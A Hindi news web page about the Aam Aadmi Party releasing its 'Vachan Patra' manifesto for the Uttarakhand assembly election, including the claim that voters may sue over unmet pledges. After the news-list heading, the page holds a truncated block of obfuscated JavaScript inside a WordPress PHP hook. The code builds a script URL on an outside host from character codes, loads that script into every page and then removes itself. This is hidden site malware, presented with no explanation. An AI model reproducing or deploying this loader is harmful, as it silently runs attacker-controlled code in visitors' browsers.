Saturday, July 27, 2024
spot_img

उत्तराखण्ड विधानसभा चुनावः आम आदमी पार्टी ने जारी किया घोषणा पत्र ‘वचन पत्र’! कहा एक भी वचन पूरा नहीं हुआ तो जनता ‘आप’ पर दर्ज कर सकती है मुकदमा

देहरादून। प्रदेश में विधानसभा चुनाव को अब कुछ समय बचा हुआ है। दो दिन बाद यानी 14 फरवरी को मतदान होगा। मतदान की तिथि जैसे-जैसे नजदीक आ रही है प्रत्याशियों के दिलों की धड़कनें बढ़ती ही जा रही है। चुनाव को लेकर सभी राजनीतिक पार्टियां दमखम के साथ प्रचार अभियान में जुटे हुए हैं। भाजपा, कांग्रेस और आप के स्टार प्रचारक लगातार प्रदेश में अलग-अलग जगहों पर जनसभाएं कर रहे हैं। आज प्रधानमंत्री नरेन्द्र मोदी ने कुमाऊं के अल्मोड़ा में जनसभा की और भाजपा के पक्ष में माहौल बनाने की कोशिश की। उधर आज आम आदमी पार्टी ने उत्तराखण्ड विधानसभा चुनावों को लेकर अपना घोषणा पत्र ‘वचन पत्र’ जारी कर दिया है। पार्टी के वरिष्ठ नेता और दिल्ली के कैबिनेट मंत्री गोपाल राय ने शुक्रवार को आप के प्रदेश कार्यालय में इसे जारी किया। उन्होंने कहा कि इस वचन पत्र का अगर एक भी वचन पूरा नहीं किया गया तो उत्तराखंड की जनता ‘आप’ पर मुकदमा कर सकती है। इसके लिए कर्नल अजय कोठियाल ने एफिडेबिट दिया है। आम आदमी पार्टी के वचन पत्र में अरविंद केजरीवाल की 10 गारंटी और कर्नल (सेनि) अजय कोठियाल के 119 वचन शामिल हैं। दून में गोपाल राय तो उत्तरकाशी में आम आदमी पार्टी के मुख्यमंत्री का चेहरा कर्नल अजय कोठियाल ने आप का वचन पत्र जारी किया। इसके साथ वचन पत्र में किए गए वादों को लेकर अजय कोठियाल ने शपथ पत्र भी दिया है। कर्नल अजय कोठियाल ने कहा कि जनता की आवाज सुनकर वचन पत्र बनाया है। इसमें 75 हजार लोगों के सुझाव लिए गए हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>